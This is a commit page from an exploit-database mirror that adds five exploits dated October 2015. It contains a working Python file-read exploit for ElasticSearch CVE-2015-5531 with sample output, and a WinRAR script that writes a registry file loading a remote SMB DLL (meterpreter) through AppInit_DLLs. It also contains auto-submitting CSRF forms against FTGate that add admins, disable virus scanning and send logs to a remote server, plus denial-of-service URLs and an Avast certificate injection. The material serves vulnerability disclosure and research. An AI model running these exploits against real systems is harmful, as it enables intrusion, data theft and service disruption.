bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-03

Browse source 
5 new exploits
This commit is contained in:
Offensive Security 2015-10-03 05:02:57 +00:00
parent 09104c8692
commit e21a244644
6 changed files with 598 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -34665,3 +34665,8 @@ id,file,description,date,author,platform,type,port
38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0
38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
38384,platforms/windows/remote/38384.txt,"Avast Antivirus X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0

Can't render this file because it is too large.

123
platforms/linux/webapps/38383.py Executable file
View file

@ -0,0 +1,123 @@
# elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
```
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content it's represented as an array of ints, that needs to be translated into human readable:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
```
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
import urllib, urllib2, json, sys, re
print "!dSR script for CVE-2015-5531\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')
port = 9200
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)
def createSnapdirs():
try:
url = "%s/%s" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
url = "%s/%sie" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
except urllib2.HTTPError, e:
data = json.load(e)
print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
print str(data['error'])
sys.exit()
def grabFile(xplurl):
try:
urllib2.urlopen(xplurl)
except urllib2.HTTPError, e:
data = json.load(e)
extrdata = re.findall(r'\d+', str(data['error']))
decoder = bytearray()
for i in extrdata[+2:]:
decoder.append(int(i))
print decoder
def main():
createSnapdirs()
grabFile(xplurl)
if __name__ == "__main__":
main()

54
platforms/windows/local/38381.py Executable file
View file

@ -0,0 +1,54 @@
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys
# used by winrar, we can create a specially crafted settings file and we can
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","\\\\")
print "[+] Writing Contet To Settings.reg [+]"
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"

12
platforms/windows/remote/38384.txt Executable file
View file

@ -0,0 +1,12 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=546
Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
$ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38384.zip

223
platforms/windows/webapps/38379.txt Executable file
View file

@ -0,0 +1,223 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
Vendor:
================================
www.ftgate.com
Product:
========================================
FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate 2009 that allow us to add
arbitrary remote domains,
disable antivirus scanning for various Email file attachment types, and
finally change settings
to have archived server logs sent to our remote attacker controlled server
for safe keeping.
Exploit code(s):
===============
CSRF(s):
<!DOCTYPE>
<html>
<body onLoad="invertedcross()">
<script>
function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}
</script>
1) add arbitrary domains:
-------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
method="post">
<input type="text" name="dname" value="hyp3rlinx.com" />
<input type="text" name="dtype" value="4" />
<input type="text" name="fname" value="*" />
<input type="text" name="action" value="domadd" />
<input type="text" name="domain" value="" />
<input type="text" name="newdomain" value="" />
</form>
2) sends archived logs to arbitrary remote server:
--------------------------------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="enable" value="on" />
<input type="text" name="path"
value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="6.6.6.0" />
</form>
3) disable virus scan for .jar or .exe files etc:
-------------------------------------------------
Options to control handling of virus scanning for email attachments Virus
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/filters/virus.fts" method="post">
<input type="text" name="action" value="add" />
<input type="text" name="mode" value="0" />
<input type="text" name="extension" value="dll" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode
####################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
Vendor:
================================
www.ftgate.com
Product:
================================
FTGate 2009 SR3 May 13 2010 Build 6.4.000
Vulnerability Type:
=======================
Denial of service (DOS)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple denial of service oppurtunities reside within FTGate 2009 that
allow us to disrupt and shut down
various FTGate services via GET requests by luring victimz to our website
or get them to click our malicious linxs.
Exploit code(s):
===============
DOS:
1) shutdown solight web mail interface on port 80
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
2) shutdown Monitor server port 8081
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
3) shutdown FTGate connector server port 8090 listens on address 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
4) shutdown IMAP server port 143 listening on 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.000
Vulnerable Parameter(s): [+] action, id
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

181
platforms/windows/webapps/38380.txt Executable file
View file

@ -0,0 +1,181 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add arbitrary mailbox & disable antivirus,
5) remove email attachment blocking for filez.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable Antivirus for .exe files: also, has a persistent XSS inject but our
payload gets truncated at 5 chars,
but can corrupt the loading of valid XML returned from database to the WEB
UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
when access the above URL it returns XML with all file extensions blocked
on incoming email, we now know ID in database.
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx